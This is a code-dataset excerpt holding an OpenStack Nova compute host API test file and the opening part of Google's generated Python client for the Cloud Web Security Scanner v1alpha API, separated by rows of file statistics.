] | 1 | 2020-07-24T09:39:47.000Z | 2020-07-24T09:39:47.000Z | # Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.cells import utils as cells_utils
from nova import compute
from nova.compute import rpcapi as compute_rpcapi
from nova import context
from nova.openstack.common import rpc
from nova import test
class ComputeHostAPITestCase(test.TestCase):
def setUp(self):
super(ComputeHostAPITestCase, self).setUp()
self.host_api = compute.HostAPI()
self.ctxt = context.get_admin_context()
def _mock_rpc_call(self, expected_message, result=None):
if result is None:
result = 'fake-result'
self.mox.StubOutWithMock(rpc, 'call')
rpc.call(self.ctxt, 'compute.fake_host',
expected_message, None).AndReturn(result)
def _mock_assert_host_exists(self):
"""Sets it so that the host API always thinks that 'fake_host'
exists.
"""
def fake_assert_host_exists(context, host_name):
return 'fake_host'
self.stubs.Set(self.host_api, '_assert_host_exists',
fake_assert_host_exists)
def test_set_host_enabled(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'set_host_enabled',
'namespace': None,
'args': {'enabled': 'fake_enabled'},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.set_host_enabled(self.ctxt, 'fake_host',
'fake_enabled')
self.assertEqual('fake-result', result)
def test_host_name_from_assert_hosts_exists(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'set_host_enabled',
'namespace': None,
'args': {'enabled': 'fake_enabled'},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.set_host_enabled(self.ctxt, 'fake_hosT',
'fake_enabled')
self.assertEqual('fake-result', result)
def test_get_host_uptime(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'get_host_uptime',
'namespace': None,
'args': {},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.get_host_uptime(self.ctxt, 'fake_host')
self.assertEqual('fake-result', result)
def test_host_power_action(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'host_power_action',
'namespace': None,
'args': {'action': 'fake_action'},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.host_power_action(self.ctxt, 'fake_host',
'fake_action')
self.assertEqual('fake-result', result)
def test_set_host_maintenance(self):
self._mock_assert_host_exists()
self._mock_rpc_call(
{'method': 'host_maintenance_mode',
'namespace': None,
'args': {'host': 'fake_host', 'mode': 'fake_mode'},
'version': compute_rpcapi.ComputeAPI.BASE_RPC_API_VERSION})
self.mox.ReplayAll()
result = self.host_api.set_host_maintenance(self.ctxt, 'fake_host',
'fake_mode')
self.assertEqual('fake-result', result)
def test_service_get_all_no_zones(self):
services = [dict(id=1, key1='val1', key2='val2', topic='compute',
host='host1'),
dict(id=2, key1='val2', key3='val3', topic='compute',
host='host2')]
self.mox.StubOutWithMock(self.host_api.db,
'service_get_all')
# Test no filters
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt)
self.mox.VerifyAll()
self.assertEqual(services, result)
# Test no filters #2
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt, filters={})
self.mox.VerifyAll()
self.assertEqual(services, result)
# Test w/ filter
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=dict(key1='val2'))
self.mox.VerifyAll()
self.assertEqual([services[1]], result)
def test_service_get_all(self):
services = [dict(id=1, key1='val1', key2='val2', topic='compute',
host='host1'),
dict(id=2, key1='val2', key3='val3', topic='compute',
host='host2')]
exp_services = []
for service in services:
exp_service = {}
exp_service.update(availability_zone='nova', **service)
exp_services.append(exp_service)
self.mox.StubOutWithMock(self.host_api.db,
'service_get_all')
# Test no filters
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt, set_zones=True)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
# Test no filters #2
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt, filters={},
set_zones=True)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
# Test w/ filter
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=dict(key1='val2'),
set_zones=True)
self.mox.VerifyAll()
self.assertEqual([exp_services[1]], result)
# Test w/ zone filter but no set_zones arg.
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
filters = {'availability_zone': 'nova'}
result = self.host_api.service_get_all(self.ctxt,
filters=filters)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
def test_service_get_by_compute_host(self):
self.mox.StubOutWithMock(self.host_api.db,
'service_get_by_compute_host')
self.host_api.db.service_get_by_compute_host(self.ctxt,
'fake-host').AndReturn('fake-response')
self.mox.ReplayAll()
result = self.host_api.service_get_by_compute_host(self.ctxt,
'fake-host')
self.assertEqual('fake-response', result)
def test_service_update(self):
host_name = 'fake-host'
binary = 'nova-compute'
params_to_update = dict(disabled=True)
service_id = 42
expected_result = {'id': service_id}
self.mox.StubOutWithMock(self.host_api.db, 'service_get_by_args')
self.host_api.db.service_get_by_args(self.ctxt,
host_name, binary).AndReturn({'id': service_id})
self.mox.StubOutWithMock(self.host_api.db, 'service_update')
self.host_api.db.service_update(
self.ctxt, service_id, params_to_update).AndReturn(expected_result)
self.mox.ReplayAll()
result = self.host_api.service_update(
self.ctxt, host_name, binary, params_to_update)
self.assertEqual(expected_result, result)
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(self.host_api.db,
'instance_get_all_by_host')
self.host_api.db.instance_get_all_by_host(self.ctxt,
'fake-host').AndReturn(['fake-responses'])
self.mox.ReplayAll()
result = self.host_api.instance_get_all_by_host(self.ctxt,
'fake-host')
self.assertEqual(['fake-responses'], result)
def test_task_log_get_all(self):
self.mox.StubOutWithMock(self.host_api.db, 'task_log_get_all')
self.host_api.db.task_log_get_all(self.ctxt,
'fake-name', 'fake-begin', 'fake-end', host='fake-host',
state='fake-state').AndReturn('fake-response')
self.mox.ReplayAll()
result = self.host_api.task_log_get_all(self.ctxt, 'fake-name',
'fake-begin', 'fake-end', host='fake-host',
state='fake-state')
self.assertEqual('fake-response', result)
class ComputeHostAPICellsTestCase(ComputeHostAPITestCase):
def setUp(self):
self.flags(compute_api_class='nova.compute.cells_api.ComputeCellsAPI')
super(ComputeHostAPICellsTestCase, self).setUp()
def _mock_rpc_call(self, expected_message, result=None):
if result is None:
result = 'fake-result'
# Wrapped with cells call
expected_message = {'method': 'proxy_rpc_to_manager',
'namespace': None,
'args': {'topic': 'compute.fake_host',
'rpc_message': expected_message,
'call': True,
'timeout': None},
'version': '1.2'}
self.mox.StubOutWithMock(rpc, 'call')
rpc.call(self.ctxt, 'cells', expected_message,
None).AndReturn(result)
def test_service_get_all_no_zones(self):
services = [dict(id=1, key1='val1', key2='val2', topic='compute',
host='host1'),
dict(id=2, key1='val2', key3='val3', topic='compute',
host='host2')]
fake_filters = {'key1': 'val1'}
self.mox.StubOutWithMock(self.host_api.cells_rpcapi,
'service_get_all')
self.host_api.cells_rpcapi.service_get_all(self.ctxt,
filters=fake_filters).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=fake_filters)
self.assertEqual(services, result)
def test_service_get_all(self):
services = [dict(id=1, key1='val1', key2='val2', topic='compute',
host='host1'),
dict(id=2, key1='val2', key3='val3', topic='compute',
host='host2')]
exp_services = []
for service in services:
exp_service = {}
exp_service.update(availability_zone='nova', **service)
exp_services.append(exp_service)
fake_filters = {'key1': 'val1'}
self.mox.StubOutWithMock(self.host_api.cells_rpcapi,
'service_get_all')
self.host_api.cells_rpcapi.service_get_all(self.ctxt,
filters=fake_filters).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=fake_filters,
set_zones=True)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
# Test w/ zone filter but no set_zones arg.
self.mox.ResetAll()
fake_filters = {'availability_zone': 'nova'}
        # Zone filter is done client-side, so should be stripped
# from this call.
self.host_api.cells_rpcapi.service_get_all(self.ctxt,
filters={}).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=fake_filters)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
def test_service_get_by_compute_host(self):
self.mox.StubOutWithMock(self.host_api.cells_rpcapi,
'service_get_by_compute_host')
self.host_api.cells_rpcapi.service_get_by_compute_host(self.ctxt,
'fake-host').AndReturn('fake-response')
self.mox.ReplayAll()
result = self.host_api.service_get_by_compute_host(self.ctxt,
'fake-host')
self.assertEqual('fake-response', result)
def test_service_update(self):
host_name = 'fake-host'
binary = 'nova-compute'
params_to_update = dict(disabled=True)
service_id = 42
expected_result = {'id': service_id}
self.mox.StubOutWithMock(self.host_api.cells_rpcapi, 'service_update')
self.host_api.cells_rpcapi.service_update(
self.ctxt, host_name,
binary, params_to_update).AndReturn(expected_result)
self.mox.ReplayAll()
result = self.host_api.service_update(
self.ctxt, host_name, binary, params_to_update)
self.assertEqual(expected_result, result)
def test_instance_get_all_by_host(self):
instances = [dict(id=1, cell_name='cell1', host='host1'),
dict(id=2, cell_name='cell2', host='host1'),
dict(id=3, cell_name='cell1', host='host2')]
self.mox.StubOutWithMock(self.host_api.db,
'instance_get_all_by_host')
self.host_api.db.instance_get_all_by_host(self.ctxt,
'fake-host').AndReturn(instances)
self.mox.ReplayAll()
expected_result = [instances[0], instances[2]]
cell_and_host = cells_utils.cell_with_item('cell1', 'fake-host')
result = self.host_api.instance_get_all_by_host(self.ctxt,
cell_and_host)
self.assertEqual(expected_result, result)
def test_task_log_get_all(self):
self.mox.StubOutWithMock(self.host_api.cells_rpcapi,
'task_log_get_all')
self.host_api.cells_rpcapi.task_log_get_all(self.ctxt,
'fake-name', 'fake-begin', 'fake-end', host='fake-host',
state='fake-state').AndReturn('fake-response')
self.mox.ReplayAll()
result = self.host_api.task_log_get_all(self.ctxt, 'fake-name',
'fake-begin', 'fake-end', host='fake-host',
state='fake-state')
self.assertEqual('fake-response', result)
| 42.328982 | 79 | 0.57587 | 1,824 | 16,212 | 4.862939 | 0.103618 | 0.053213 | 0.070688 | 0.045998 | 0.786359 | 0.77531 | 0.762683 | 0.744194 | 0.726719 | 0.705524 | 0 | 0.007761 | 0.316494 | 16,212 | 382 | 80 | 42.439791 | 0.792708 | 0.058969 | 0 | 0.72093 | 0 | 0 | 0.105017 | 0.010587 | 0 | 0 | 0 | 0 | 0.109635 | 1 | 0.076412 | false | 0 | 0.019934 | 0.003322 | 0.106312 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
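The nova tests above drive mox's record/replay cycle: `StubOutWithMock` a method, set expectations with `AndReturn`, call `ReplayAll`, exercise the code, then `VerifyAll`. A minimal sketch of the same stub-and-verify idea using the standard-library `unittest.mock` — the `FakeHostAPI` class here is a stand-in with just enough surface for the example, not the real nova `HostAPI`:

```python
from unittest import mock

class FakeHostAPI(object):
    """Hypothetical stand-in for an API object that delegates to a db layer."""

    def __init__(self, db):
        self.db = db

    def service_get_by_compute_host(self, context, host_name):
        return self.db.service_get_by_compute_host(context, host_name)

def run_example():
    db = mock.Mock()
    # Equivalent of StubOutWithMock + AndReturn: a canned return value.
    db.service_get_by_compute_host.return_value = "fake-response"
    api = FakeHostAPI(db)
    result = api.service_get_by_compute_host("ctxt", "fake-host")
    # Equivalent of VerifyAll: the expected call happened exactly once,
    # with exactly these arguments.
    db.service_get_by_compute_host.assert_called_once_with("ctxt", "fake-host")
    return result
```

Unlike mox, `unittest.mock` verifies after the fact rather than requiring expectations to be recorded up front, which removes the `ReplayAll`/`ResetAll` bookkeeping these tests repeat.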
6ab946b3574d96dfc214417eb890451b4da41f97 | 55,887 | py | Python | websecurityscanner/google/cloud/websecurityscanner_v1alpha/gapic/web_security_scanner_client.py | q-logic/google-cloud-python | a65065c89c059bc564bbdd79288a48970907c399 | [
"Apache-2.0"
] | null | null | null | websecurityscanner/google/cloud/websecurityscanner_v1alpha/gapic/web_security_scanner_client.py | q-logic/google-cloud-python | a65065c89c059bc564bbdd79288a48970907c399 | [
"Apache-2.0"
] | 40 | 2019-07-16T10:04:48.000Z | 2020-01-20T09:04:59.000Z | websecurityscanner/google/cloud/websecurityscanner_v1alpha/gapic/web_security_scanner_client.py | q-logic/google-cloud-python | a65065c89c059bc564bbdd79288a48970907c399 | [
"Apache-2.0"
] | 2 | 2019-07-18T00:05:31.000Z | 2019-11-27T14:17:22.000Z | # -*- coding: utf-8 -*-
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.cloud.websecurityscanner.v1alpha WebSecurityScanner API."""
import functools
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.page_iterator
import google.api_core.path_template
import grpc
from google.cloud.websecurityscanner_v1alpha.gapic import enums
from google.cloud.websecurityscanner_v1alpha.gapic import (
web_security_scanner_client_config,
)
from google.cloud.websecurityscanner_v1alpha.gapic.transports import (
web_security_scanner_grpc_transport,
)
from google.cloud.websecurityscanner_v1alpha.proto import finding_pb2
from google.cloud.websecurityscanner_v1alpha.proto import scan_config_pb2
from google.cloud.websecurityscanner_v1alpha.proto import scan_run_pb2
from google.cloud.websecurityscanner_v1alpha.proto import web_security_scanner_pb2
from google.cloud.websecurityscanner_v1alpha.proto import web_security_scanner_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
"google-cloud-websecurityscanner"
).version
class WebSecurityScannerClient(object):
"""
Cloud Web Security Scanner Service identifies security vulnerabilities in web
applications hosted on Google Cloud Platform. It crawls your application, and
attempts to exercise as many user inputs and event handlers as possible.
"""
SERVICE_ADDRESS = "websecurityscanner.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.cloud.websecurityscanner.v1alpha.WebSecurityScanner"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
WebSecurityScannerClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@classmethod
def finding_path(cls, project, scan_config, scan_run, finding):
"""Return a fully-qualified finding string."""
return google.api_core.path_template.expand(
"projects/{project}/scanConfigs/{scan_config}/scanRuns/{scan_run}/findings/{finding}",
project=project,
scan_config=scan_config,
scan_run=scan_run,
finding=finding,
)
@classmethod
def project_path(cls, project):
"""Return a fully-qualified project string."""
return google.api_core.path_template.expand(
"projects/{project}", project=project
)
@classmethod
def scan_config_path(cls, project, scan_config):
"""Return a fully-qualified scan_config string."""
return google.api_core.path_template.expand(
"projects/{project}/scanConfigs/{scan_config}",
project=project,
scan_config=scan_config,
)
@classmethod
def scan_run_path(cls, project, scan_config, scan_run):
"""Return a fully-qualified scan_run string."""
return google.api_core.path_template.expand(
"projects/{project}/scanConfigs/{scan_config}/scanRuns/{scan_run}",
project=project,
scan_config=scan_config,
scan_run=scan_run,
)
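The `*_path` classmethods above expand fixed URI templates. For templates with only simple named segments, `google.api_core.path_template.expand` behaves like named `str.format` substitution, so the result can be sketched without the library:

```python
# Sketch of what the *_path helpers produce. The real client uses
# google.api_core.path_template.expand; for these templates the
# output matches plain named substitution.
FINDING_TEMPLATE = (
    "projects/{project}/scanConfigs/{scan_config}"
    "/scanRuns/{scan_run}/findings/{finding}"
)

def finding_path(project, scan_config, scan_run, finding):
    """Return a fully-qualified finding resource name."""
    return FINDING_TEMPLATE.format(
        project=project,
        scan_config=scan_config,
        scan_run=scan_run,
        finding=finding,
    )

print(finding_path("my-project", "cfg-1", "run-1", "finding-1"))
# projects/my-project/scanConfigs/cfg-1/scanRuns/run-1/findings/finding-1
```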
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
client_options=None,
):
"""Constructor.
Args:
transport (Union[~.WebSecurityScannerGrpcTransport,
Callable[[~.Credentials, type], ~.WebSecurityScannerGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
client_options (Union[dict, google.api_core.client_options.ClientOptions]):
Client options used to set user options on the client. API Endpoint
should be set through client_options.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = web_security_scanner_client_config.config
if channel:
warnings.warn(
                "The `channel` argument is deprecated; use `transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
            if isinstance(client_options, dict):
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=web_security_scanner_grpc_transport.WebSecurityScannerGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = web_security_scanner_grpc_transport.WebSecurityScannerGrpcTransport(
address=api_endpoint, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
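The `_inner_api_calls` dictionary initialized above implements a lazy per-RPC cache: each service method wraps its raw transport method on first use and reuses the wrapper afterwards. A minimal sketch of that pattern, with a plain function standing in for the transport method and a counter standing in for `wrap_method`'s retry/timeout machinery:

```python
class TinyClient:
    """Toy model of the lazy per-RPC wrapper cache."""

    def __init__(self):
        self._inner_api_calls = {}
        self.wrap_count = 0  # how many times wrapping actually ran

    def _wrap(self, func):
        # Stand-in for google.api_core.gapic_v1.method.wrap_method,
        # which layers retry and timeout handling around `func`.
        self.wrap_count += 1
        def wrapped(*args, **kwargs):
            return func(*args, **kwargs)
        return wrapped

    def _call(self, name, func, *args, **kwargs):
        # Wrap on first use only; subsequent calls hit the cache.
        if name not in self._inner_api_calls:
            self._inner_api_calls[name] = self._wrap(func)
        return self._inner_api_calls[name](*args, **kwargs)

client = TinyClient()
print(client._call("echo", str.upper, "a"))  # A
print(client._call("echo", str.upper, "b"))  # B
print(client.wrap_count)  # 1
```

Wrapping once per method name keeps retry/timeout configuration parsing off the per-request hot path.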
# Service calls
def create_scan_config(
self,
parent,
scan_config,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Creates a new ScanConfig.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>> # TODO: Initialize `scan_config`:
>>> scan_config = {}
>>>
>>> response = client.create_scan_config(parent, scan_config)
Args:
parent (str): Required. The parent resource name where the scan is created, which should be a
project resource name in the format 'projects/{projectId}'.
scan_config (Union[dict, ~google.cloud.websecurityscanner_v1alpha.types.ScanConfig]): Required. The ScanConfig to be created.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "create_scan_config" not in self._inner_api_calls:
self._inner_api_calls[
"create_scan_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.create_scan_config,
default_retry=self._method_configs["CreateScanConfig"].retry,
default_timeout=self._method_configs["CreateScanConfig"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.CreateScanConfigRequest(
parent=parent, scan_config=scan_config
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["create_scan_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
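The routing-header block above (repeated in every RPC method below) turns a `("parent", parent)` pair into a gRPC metadata entry so the backend can route the request by resource. A rough sketch of the transformation, assuming the conventional `x-goog-request-params` metadata key and URL-encoding that `google.api_core.gapic_v1.routing_header` uses:

```python
from urllib.parse import urlencode

def to_grpc_metadata(params):
    # Sketch: encode (key, value) pairs into the single
    # x-goog-request-params metadata entry.
    return ("x-goog-request-params", urlencode(params))

metadata = []
routing_header = [("parent", "projects/my-project")]
metadata.append(to_grpc_metadata(routing_header))
print(metadata)  # [('x-goog-request-params', 'parent=projects%2Fmy-project')]
```

The surrounding `try`/`except AttributeError` in the client exists because `parent` may be a request object rather than a string; when the attribute lookup fails, the routing header is simply skipped.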
def delete_scan_config(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Deletes an existing ScanConfig and its child resources.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_config_path('[PROJECT]', '[SCAN_CONFIG]')
>>>
>>> client.delete_scan_config(name)
Args:
name (str): Required. The resource name of the ScanConfig to be deleted. The name follows the
format of 'projects/{projectId}/scanConfigs/{scanConfigId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "delete_scan_config" not in self._inner_api_calls:
self._inner_api_calls[
"delete_scan_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.delete_scan_config,
default_retry=self._method_configs["DeleteScanConfig"].retry,
default_timeout=self._method_configs["DeleteScanConfig"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.DeleteScanConfigRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
self._inner_api_calls["delete_scan_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def get_scan_config(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets a ScanConfig.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_config_path('[PROJECT]', '[SCAN_CONFIG]')
>>>
>>> response = client.get_scan_config(name)
Args:
name (str): Required. The resource name of the ScanConfig to be returned. The name follows the
format of 'projects/{projectId}/scanConfigs/{scanConfigId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "get_scan_config" not in self._inner_api_calls:
self._inner_api_calls[
"get_scan_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_scan_config,
default_retry=self._method_configs["GetScanConfig"].retry,
default_timeout=self._method_configs["GetScanConfig"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.GetScanConfigRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["get_scan_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_scan_configs(
self,
parent,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Lists ScanConfigs under a given project.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>> # Iterate over all results
>>> for element in client.list_scan_configs(parent):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_scan_configs(parent).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The parent resource name, which should be a project resource name in the
format 'projects/{projectId}'.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
